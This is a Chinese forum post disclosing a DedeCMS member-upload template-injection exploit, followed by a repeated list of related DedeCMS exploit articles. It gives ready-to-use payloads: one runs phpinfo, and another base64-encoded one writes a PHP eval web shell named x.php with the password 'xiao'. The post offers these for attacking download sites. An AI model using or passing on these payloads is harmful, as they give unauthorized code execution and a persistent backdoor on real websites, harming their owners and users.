作者:toby57
博客:http://hi.baidu.com/toby57
作者潜伏于论坛多年,不发帖,只能代为转发了。PHP牛人...
因为鸡肋,所以发出来。
说下利用方法:注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行。
生成的解析文件内容如下:
漏洞鸡肋之处在于经历上次的0day冲击后,很多站点已经关闭了会员功能或者直接删除了member目录,并且没有多少站会有软件栏目的,嗯 ,所以搞搞 下载站之类的差不多了。
---a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码:xiao
只显示10条记录相关文章
DEDECMS爆严重安全漏洞 免账号密码直接进入后台 (浏览: 21020, 评论: 0)
DeDecms xss 通杀0day 附getshell EXP (浏览: 27861, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35443, 评论: 0)
dedecms 管理后台程序下载漏洞 (浏览: 13248, 评论: 0)
dedecms默认的注册用户 (浏览: 12968, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16389, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37599, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22238, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 11171, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10277, 评论: 0)
DeDecms xss 通杀0day 附getshell EXP (浏览: 27861, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35443, 评论: 0)
dedecms 管理后台程序下载漏洞 (浏览: 13248, 评论: 0)
dedecms默认的注册用户 (浏览: 12968, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16389, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37599, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22238, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 11171, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10277, 评论: 0)